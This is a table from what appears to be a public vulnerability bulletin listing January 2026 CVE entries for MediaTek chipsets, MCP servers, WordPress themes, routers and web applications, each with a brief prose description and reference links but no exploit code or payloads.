| MediaTek, Inc.--MT2718, MT6765, MT6768, MT6781, MT6833, MT6835, MT6853, MT6855, MT6877, MT6879, MT6893, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8367, MT8391, MT8676, MT8678, MT8696, MT8766, MT8768, MT8781, MT8786, MT8788E, MT8791T, MT8792, MT8793, MT8796, MT8873, MT8883, MT8893 | In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10315812; Issue ID: MSV-5534. | 2026-01-06 | not yet calculated | CVE-2025-20797 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2718, MT6765, MT6768, MT6781, MT6833, MT6835, MT6853, MT6855, MT6877, MT6879, MT6893, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8367, MT8391, MT8676, MT8678, MT8696, MT8766, MT8768, MT8781, MT8786, MT8788E, MT8791T, MT8792, MT8793, MT8796, MT8873, MT8883, MT8893 | In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10315812; Issue ID: MSV-5533. | 2026-01-06 | not yet calculated | CVE-2025-20798 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2718, MT6899, MT6989, MT6991, MT8678, MT8793 | In mminfra, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10267349; Issue ID: MSV-5033. | 2026-01-06 | not yet calculated | CVE-2025-20800 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6815, MT6833, MT6835, MT6853, MT6855, MT6873, MT6875, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6896, MT6897, MT6899, MT6980, MT6983, MT6985, MT6986, MT6989, MT6990, MT6991, MT6993, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01689259 / MOLY01586470; Issue ID: MSV-4847. | 2026-01-06 | not yet calculated | CVE-2025-20794 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6815, MT6833, MT6835, MT6853, MT6855, MT6873, MT6875, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6896, MT6897, MT6899, MT6980, MT6983, MT6985, MT6989, MT6990, MT6991, MT6993, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01430930; Issue ID: MSV-4836. | 2026-01-06 | not yet calculated | CVE-2025-20793 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01311265; Issue ID: MSV-4655. | 2026-01-06 | not yet calculated | CVE-2025-20761 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6835, MT6853, MT6855, MT6873, MT6875, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6896, MT6897, MT6899, MT6980, MT6983, MT6985, MT6986, MT6989, MT6990, MT6991, MT6993, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible read of uninitialized heap data due to an uncaught exception. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01676750; Issue ID: MSV-4653. | 2026-01-06 | not yet calculated | CVE-2025-20760 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184870; Issue ID: MSV-4729. | 2026-01-06 | not yet calculated | CVE-2025-20778 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible use after free due to a race condition. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184084; Issue ID: MSV-4720. | 2026-01-06 | not yet calculated | CVE-2025-20779 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184061; Issue ID: MSV-4712. | 2026-01-06 | not yet calculated | CVE-2025-20780 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182914; Issue ID: MSV-4699. | 2026-01-06 | not yet calculated | CVE-2025-20781 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182882; Issue ID: MSV-4685. | 2026-01-06 | not yet calculated | CVE-2025-20782 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182882; Issue ID: MSV-4684. | 2026-01-06 | not yet calculated | CVE-2025-20783 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to uninitialized data. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182882; Issue ID: MSV-4683. | 2026-01-06 | not yet calculated | CVE-2025-20784 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10149882; Issue ID: MSV-4677. | 2026-01-06 | not yet calculated | CVE-2025-20785 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10149882; Issue ID: MSV-4673. | 2026-01-06 | not yet calculated | CVE-2025-20786 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6835, MT6835T, MT6878, MT6878M, MT6897, MT6899, MT6991, MT8676, MT8678, MT8755, MT8792, MT8793, MT8863, MT8873, MT8883 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01685181; Issue ID: MSV-4760. | 2026-01-06 | not yet calculated | CVE-2025-20762 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6878, MT6897, MT6899, MT6985, MT6989, MT6991, MT6993, MT8792, MT8796, MT8798 | In seninf, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10251210; Issue ID: MSV-4926. | 2026-01-06 | not yet calculated | CVE-2025-20801 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991 | In dpe, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS10198951; Issue ID: MSV-4503. | 2026-01-06 | not yet calculated | CVE-2025-20804 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT6993, MT8793 | In c2ps, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10274607; Issue ID: MSV-5049. | 2026-01-06 | not yet calculated | CVE-2025-20799 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible memory corruption due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS10199779; Issue ID: MSV-4504. | 2026-01-06 | not yet calculated | CVE-2025-20803 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10114696; Issue ID: MSV-4480. | 2026-01-06 | not yet calculated | CVE-2025-20805 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10114835; Issue ID: MSV-4479. | 2026-01-06 | not yet calculated | CVE-2025-20806 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10114841; Issue ID: MSV-4451. | 2026-01-06 | not yet calculated | CVE-2025-20807 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6989, MT8796, MT8893 | In imgsys, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS10314745; Issue ID: MSV-5553. | 2026-01-06 | not yet calculated | CVE-2025-20796 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6991, MT8196, MT8367, MT8781, MT8786, MT8793 | In geniezone, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10238968; Issue ID: MSV-4914. | 2026-01-06 | not yet calculated | CVE-2025-20802 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| Microsoft--Playwright | Microsoft Playwright MCP Server versions prior to 0.0.40 fail to validate the Origin header on incoming connections. This allows an attacker to perform a DNS rebinding attack via a victim's web browser and send unauthorized requests to a locally running MCP server, resulting in unintended invocation of MCP tool endpoints. | 2026-01-07 | not yet calculated | CVE-2025-9611 | https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-8rgw-6xp9-2fg3 https://github.com/microsoft/playwright/commit/1313fbd https://www.vulncheck.com/advisories/microsoft-playwright-mcp-server-dns-rebinding-via-missing-origin-header-validation |
| Mikado-Themes--Curly | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Curly curly allows PHP Local File Inclusion. This issue affects Curly: from n/a through < 3.3. | 2026-01-08 | not yet calculated | CVE-2025-67936 | https://vdp.patchstack.com/database/Wordpress/Theme/curly/vulnerability/wordpress-curly-theme-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Hendon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Hendon hendon allows PHP Local File Inclusion. This issue affects Hendon: from n/a through < 1.7. | 2026-01-08 | not yet calculated | CVE-2025-67937 | https://vdp.patchstack.com/database/Wordpress/Theme/hendon/vulnerability/wordpress-hendon-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Optimize | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Optimize optimizewp allows PHP Local File Inclusion. This issue affects Optimize: from n/a through < 2.4. | 2026-01-08 | not yet calculated | CVE-2025-67935 | https://vdp.patchstack.com/database/Wordpress/Theme/optimizewp/vulnerability/wordpress-optimize-theme-2-4-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Wellspring | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wellspring wellspring allows PHP Local File Inclusion. This issue affects Wellspring: from n/a through < 2.8. | 2026-01-08 | not yet calculated | CVE-2025-67934 | https://vdp.patchstack.com/database/Wordpress/Theme/wellspring/vulnerability/wordpress-wellspring-theme-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| n/a-- GL Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 | GL Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 are vulnerable in the GL.iNet custom opkg wrapper script located at /usr/libexec/opkg-call. The script is executed with root privileges when triggered via the LuCI web interface or authenticated API calls to manage packages. The vulnerable code uses shell redirection to create a lock file in the world-writable /tmp directory. | 2026-01-08 | not yet calculated | CVE-2025-67091 | https://www.gl-inet.com/ https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub https://aleksazatezalo.medium.com/critical-authentication-bypass-vulnerability-in-gl-inet-gl-axt1800-router-firmware-f19442ca721d |
| n/a-- realme Internet browser v.45.13.4.1 | An issue in realme Internet browser v.45.13.4.1 allows a remote attacker to execute arbitrary code via a crafted webpage in the built-in HeyTap/ColorOS browser. | 2026-01-05 | not yet calculated | CVE-2025-67316 | http://internet.com http://realme.com https://gist.github.com/Brucewebva/ceb365b7cea0d0b8ec0ce6755177de83 |
| n/a--@sylphxltd/filesystem-mcp v0.5.8 | @sylphxltd/filesystem-mcp v0.5.8 is an MCP server that provides file content reading functionality. Version 0.5.8 of filesystem-mcp contains a critical path traversal vulnerability in its "read_content" tool. This vulnerability arises from improper symlink handling in the path validation mechanism: the resolvePath function checks path validity before resolving symlinks, while fs.readFile resolves symlinks automatically during file access. This allows attackers to bypass directory restrictions by leveraging symlinks within the allowed directory that point to external files, enabling unauthorized access to files outside the intended operational scope. | 2026-01-07 | not yet calculated | CVE-2025-67366 | https://github.com/sylphxltd/filesystem-mcp/issues/134 https://github.com/sylphxltd/filesystem-mcp |
| n/a--AppConnector component version 10.10.0.183 and earlier of enaio 10.10, in the AppConnector component version 11.0.0.183 and earlier of enaio 11.0, and in the AppConnector component version 11.10.0.183 and earlier of enaio 11.10 | An issue was discovered in the AppConnector component version 10.10.0.183 and earlier of enaio 10.10, in the AppConnector component version 11.0.0.183 and earlier of enaio 11.0, and in the AppConnector component version 11.10.0.183 and earlier of enaio 11.10. The vulnerability allows authenticated remote attackers to inject arbitrary SMTP commands via crafted input to the /osrest/api/organization/sendmail endpoint. | 2026-01-08 | not yet calculated | CVE-2025-56425 | https://www.optimal-systems.de/enaio https://mind-bytes.de/smtp-injection-in-enaio-component-appconnector-cve-2025-56425/ |
| n/a--Area9 Rhapsode 1.47.3 | In Area9 Rhapsode 1.47.3, an authenticated attacker can exploit the operation, url, and filename parameters via a POST request to read arbitrary files from the server filesystem. Fixed in 1.47.4 (#7254) and further versions. | 2026-01-09 | not yet calculated | CVE-2025-67810 | https://area9.com https://security.area9lyceum.com/cve-2025-67810/ |
| n/a--Area9 Rhapsode 1.47.3 | Area9 Rhapsode 1.47.3 allows SQL Injection via multiple API endpoints accessible to authenticated users. Insufficient input validation allows remote attackers to inject arbitrary SQL commands, resulting in unauthorized database access and potential compromise of sensitive data. Fixed in v.1.47.4 and beyond. | 2026-01-09 | not yet calculated | CVE-2025-67811 | https://area9.com https://security.area9lyceum.com/cve-2025-67811/ |
| n/a--ARIS 10.0.23.0.3587512 | A file upload vulnerability in ARIS 10.0.23.0.3587512 allows attackers to execute arbitrary code via uploading a crafted PDF file/malware. | 2026-01-07 | not yet calculated | CVE-2025-66837 | https://www.softwareag.com/ https://github.com/saykino/CVE-2025-66837/ |
| n/a--Aris v10.0.23.0.3587512 and before | In Aris v10.0.23.0.3587512 and before, the file upload functionality does not enforce any rate limiting or throttling, allowing users to upload files at an unrestricted rate. An attacker can exploit this behavior to rapidly upload a large volume of files, potentially leading to resource exhaustion such as disk space depletion, increased server load, or degraded performance. | 2026-01-07 | not yet calculated | CVE-2025-66838 | https://www.softwareag.com/ https://github.com/saykino/CVE-2025-66838/ |
| n/a--Axtion ODISSAAS ODIS v1.8.4 | A DLL hijacking vulnerability in Axtion ODISSAAS ODIS v1.8.4 allows attackers to execute arbitrary code via a crafted DLL file. | 2026-01-09 | not yet calculated | CVE-2025-66715 | https://www.axtion.nl/odis/ https://b1tsec.gitbook.io/offensive-repo/cve-repository/cve-2025-66715 |
| n/a--Blue Access Cobalt v02.000.195 | Blue Access Cobalt v02.000.195 suffers from an authentication bypass vulnerability, which allows an attacker to selectively proxy requests in order to operate functionality on the web application without the need to authenticate with legitimate credentials. | 2026-01-06 | not yet calculated | CVE-2025-60534 | http://blue.com https://github.com/PilotPatrickk/Published-CVEs/blob/main/CVE-2025-60534.md |
| n/a--ComfyUI-Manager prior to version 3.38 | An issue in ComfyUI-Manager prior to version 3.38 allowed remote attackers to potentially manipulate its configuration and critical data. This was due to the application storing its files in an insufficiently protected location that was accessible via the web interface. | 2026-01-05 | not yet calculated | CVE-2025-67303 | https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md https://github.com/Comfy-Org/ComfyUI-Manager/pull/2338/commits/e44c5cef58fb4973670b86433b9d24d077b44a26 |
| n/a--CouchCMS 2.4 | An Information Disclosure vulnerability in CouchCMS 2.4 allows an Admin user to read arbitrary files by repeatedly traversing back through parent directories. It can disclose the source code or any other confidential information if weaponized accordingly. | 2026-01-09 | not yet calculated | CVE-2025-67004 | https://www.couchcms.com/ https://github.com/CouchCMS/CouchCMS https://gist.github.com/thepiyushkumarshukla/d01f8004c43692f18c75548f4739955a |
| n/a--D-Link DIR895LA1 v102b07 | A Command Injection Vulnerability has been discovered in the DHCP daemon service of D-Link DIR895LA1 v102b07. The vulnerability exists in the lease renewal processing logic where the DHCP hostname parameter is directly concatenated into a system command without proper sanitization. When a DHCP client renews an existing lease with a malicious hostname, arbitrary commands can be executed with root privileges. | 2026-01-09 | not yet calculated | CVE-2025-69542 | https://tzh00203.notion.site/D-Link-DIR895LA1-v102b07-Command-Injection-in-DHCPd-2d4b5c52018a80a1a5ccfb317b308861?source=copy_link |
| n/a--D-Link Router DIR-605L (Hardware version F1; Firmware version: V6.02CN02) | An issue was discovered in D-Link Router DIR-605L (Hardware version F1; Firmware version: V6.02CN02) allowing an attacker with physical access to the UART pins to execute arbitrary commands due to the presence of root terminal access on a serial interface without proper access control. | 2026-01-08 | not yet calculated | CVE-2025-65731 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com/uk/en/products/dir-605l-wireless-n-300-home-cloud-router https://gist.github.com/whitej3rry/f142a93bac360f9b1126f552f64957ea https://github.com/whitej3rry/CVE-2025-65731 |
| n/a--DwyerOmega Isensix Advanced Remote Monitoring System (ARMS) 1.5.7 | DwyerOmega Isensix Advanced Remote Monitoring System (ARMS) 1.5.7 allows an attacker to retrieve sensitive information from the underlying SQL database via Blind SQL Injection through the user parameter in the login page. This allows an attacker to steal credentials, which may be cleartext, from existing users (and admins) and use them to authenticate to the application. | 2026-01-06 | not yet calculated | CVE-2025-59379 | https://isensix.com/guardian/ https://info.dwyeromega.com/brands https://github.com/PilotPatrickk/Published-CVEs/blob/main/CVE-2025-59379.md |
| n/a--EDIMAX BR-6208AC V2_1.02 | EDIMAX BR-6208AC V2_1.02 is vulnerable to Command Injection. This arises because the pppUserName field is directly passed to a shell command via the system() function without proper sanitization. An attacker can exploit this by injecting malicious commands into the pppUserName field, allowing arbitrary code execution. | 2026-01-09 | not yet calculated | CVE-2025-70161 | https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-setWAN-handler-2d3b5c52018a80d7ae8dce2bf5e3294c?source=copy_link |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | There is an issue on the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 that enables a remote attacker to create financial discrepancies by purchasing items with a negative quantity. This vulnerability is possible due to reliance on client-side input validation controls. | 2026-01-08 | not yet calculated | CVE-2025-61546 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61546 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | Cross-Site Request Forgery (CSRF) is present on all functions in edu Business Solutions Print Shop Pro WebDesk version 18.34. The application does not implement proper CSRF tokens or other protective measures, allowing a remote attacker to trick authenticated users into unknowingly executing unintended actions within their session. This can lead to unauthorized data modification such as credential updates. | 2026-01-08 | not yet calculated | CVE-2025-61547 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61547 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | SQL Injection is present on the hfInventoryDistFormID parameter in the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34. Unsanitized user input is incorporated directly into SQL queries without proper parameterization or escaping. This vulnerability allows remote attackers to execute arbitrary SQL commands. | 2026-01-08 | not yet calculated | CVE-2025-61548 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61548 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | Cross-Site Scripting (XSS) is present on the LoginID parameter on the /PSP/app/web/reg/reg_display.asp endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34. Unsanitized user input is reflected in HTTP responses without proper HTML encoding or escaping. This allows attackers to execute arbitrary JavaScript in the context of a victim's browser session. | 2026-01-08 | not yet calculated | CVE-2025-61549 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61549 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | Cross-Site Scripting (XSS) is present on the ctl00_Content01_fieldValue parameters on the /psp/appNet/TemplateOrder/TemplatePreview.aspx endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34. User-supplied input is stored and later rendered in HTML pages without proper output encoding or sanitization. This allows attackers to persistently inject arbitrary JavaScript that executes in the context of other users' sessions. | 2026-01-08 | not yet calculated | CVE-2025-61550 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61550 |
| n/a--Employee Leave Management System v.2.1 | Cross Site Request Forgery vulnerability in Employee Leave Management System v.2.1 allows a remote attacker to escalate privileges via the manage-employee.php component. | 2026-01-05 | not yet calculated | CVE-2025-67315 | https://phpgurukul.com/employee-leaves-management-system-elms/ https://github.com/r-pradyun/CVE-2025-67315 |
| n/a--evershop 2.1.0 | A Denial of Service (DoS) vulnerability in evershop 2.1.0 and prior allows unauthenticated attackers to exhaust the application server's resources via the "GET /images" API. The application fails to limit the height of the use-element shadow tree or the dimensions of pattern tiles during the processing of SVG files, resulting in unbounded resource consumption and system-wide denial of service. | 2026-01-05 | not yet calculated | CVE-2025-67419 | https://github.com/evershopcommerce/evershop https://github.com/dos-m0nk3y/CVE/tree/main/CVE-2025-67419 |
| n/a--evershop 2.1.0 | A Blind Server-Side Request Forgery (SSRF) vulnerability in evershop 2.1.0 and prior allows unauthenticated attackers to force the server to initiate an HTTP request via the "GET /images" API. The vulnerability occurs due to insufficient validation of the "src" query parameter, which permits arbitrary HTTP or HTTPS URIs, resulting in unexpected requests against internal and external networks. | 2026-01-05 | not yet calculated | CVE-2025-67427 | https://github.com/evershopcommerce/evershop https://github.com/dos-m0nk3y/CVE/tree/main/CVE-2025-67427 |
